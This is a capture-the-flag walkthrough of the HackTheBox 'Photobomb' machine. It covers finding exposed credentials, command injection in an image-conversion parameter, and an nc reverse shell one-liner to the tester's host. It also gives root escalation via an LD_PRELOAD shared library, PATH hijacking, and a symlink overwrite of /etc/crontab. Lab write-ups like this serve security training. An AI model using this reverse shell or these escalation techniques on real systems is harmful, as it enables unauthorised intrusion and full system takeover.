# HackTheBox - Photobomb

## NMAP

```bash
Nmap scan report for 10.10.11.182
Host is up (0.093s latency).
Not shown: 54171 closed tcp ports (conn-refused), 11362 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 e2:24:73:bb:fb:df:5c:b5:20:b6:68:76:74:8a:b5:8d (RSA)
|   256 04:e3:ac:6e:18:4e:1b:7e:ff:ac:4f:e3:9d:d2:1b:ae (ECDSA)
|_  256 20:e0:5d:8c:ba:71:f0:8c:3a:18:19:f2:40:11:d2:9e (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://photobomb.htb/
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

```

## PORT 80 (HTTP)
Visting the web server, it's going to redirect us to `photobomb.htb` so we need to add it in hosts file

<img src="https://i.imgur.com/mu9gGFI.png"/>

<img src="https://i.imgur.com/PtM6ejk.png"/>

<img src="https://i.imgur.com/lS4D4IV.jpg"/>

It shows a link which takes us to `/printer` that asks for credentials

<img src="https://i.imgur.com/QwZt6cC.png"/>

We can find the credentials by checking the source of the site which shows a js file having the credentials

<img src="https://i.imgur.com/P3TmMxa.png"/>

With this, we can access the printer page

<img src="https://i.imgur.com/Z9LV7Vo.jpg"/>

What this page does it converts the image into either png or jpg into the specified dimensions displayed on the site

<img src="https://i.imgur.com/GmOfo4E.png"/>

If we remove any of the POST paramter when downloading the file, it's going to show a stack error revealing that it's using `ruby sinatra` server

<img src="https://i.imgur.com/q2ukvuK.png"/>

<img src="https://i.imgur.com/myikUAY.png"/>

## Foothold

We can see from the stackerror that the `filetype` parameter is being checked if it contains either `png` or `jpeg`, so we can try command injection there, I tried appending the `id` command with `;` but it didn't returned any output

<img src="https://i.imgur.com/1qn386h.png"/>

So I tried making a curl request to my python server which was successful

<img src="https://i.imgur.com/a2USJVt.png"/>

<img src="https://i.imgur.com/4RWYzhI.png"/>

Using openbsd nc's reverse shell payload by making it url encoded

```bash
rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.72 2222 >/tmp/f
```

<img src="https://i.imgur.com/ObmY4zn.png"/>

<img src="https://i.imgur.com/WA5Jtbi.png"/>

Stabilizing the shell with python3 

<img src="https://i.imgur.com/DKpN6Ns.png"/>

## Privilege Escalation (root)
Running `sudo -l` shows that we can run `cleanup.sh` as a root user

<img src="https://i.imgur.com/qHywqqs.png"/>

## Method 1

This is allowing us to set environment variables, which means we can set `LD_PRELOAD` path which contains the path to the shared library that will be loaded before anything else, so we can abuse this by compiling this program into a shared library which will set bash a SUID and will spawn it with `bash -p` giving us a root shell

```c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
        unsetenv("LD_PRELOAD");
        setresuid(0,0,0);
        system("/bin/bash -p");
}
```

```bash
gcc -fPIC -shared -nostartfiles -o ./load.so ./test.c
```

<img src="https://i.imgur.com/KmhZQzW.png"/>

```bash
sudo LD_PRELOAD=/tmp/load.so /opt/cleanup.sh
```

<img src="https://i.imgur.com/k0bWV39.png"/>

## Method 2

Checking the script which we can run

```bash
#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb

# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
  /bin/cat log/photobomb.log > log/photobomb.log.old
  /usr/bin/truncate -s0 log/photobomb.log
fi

# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;

```

This script is switching to `/home/wizard/photobomb`, where with `-s` it checks if `photobomb.log` exists and is empty, with `-L` and `!` it checks if the logfile isn't a symlink to avoid symlinking and then overwrites the content of photobomb.log to photobomb.log and clears out the the contents of the log file, then with `find` it look for all jpg files and makes root the owner of those images

Now here `find` isn't being ran through it's absolute path which means that we can abuse it by making a file which will spawn bash for us by setting environment variables through which we can achieve PATH variable exploit

<img src="https://i.imgur.com/o29rWJf.png"/>

```bash
sudo PATH=/tmp:$PATH /opt/cleanup.sh
```

<img src="https://i.imgur.com/05ox0ch.png"/>

## Method 3

Going back to the script, the if condition checks for `photobomb.log` but not `photobomb.log.old` so we can symlink the old log file with `/etc/crontab` and include the crontab in the original log file which will basically overwrite the crontab file

So symlinking the file with cronab 

```bash
ln -sf /etc/crontab photobomb.log.old
```

<img src="https://i.imgur.com/hHaSdIe.png"/>

Now place a bash script which will make bash a SUID or you can place a reverse shell there

```bash
#!/bin/bash
chmod +s /bin/bash
```

<img src="https://i.imgur.com/1zvfK9N.png"/>

```bash
* * * * * root /tmp/shell.sh
```

Putting the cronab in `photobomb.log` file which will overwrite the old log file which will then overwrite the cronab file, making bash a SUID and then we can spawn bash with `-p` to execute it as the SUID owner which is root

<img src="https://i.imgur.com/ZKOB3aq.png"/>

## References

- https://atom.hackstreetboys.ph/linux-privilege-escalation-environment-variables/
- https://medium.com/r3d-buck3t/overwriting-preload-libraries-to-gain-root-linux-privesc-77c87b5f3bf8
- https://book.hacktricks.xyz/linux-hardening/privilege-escalation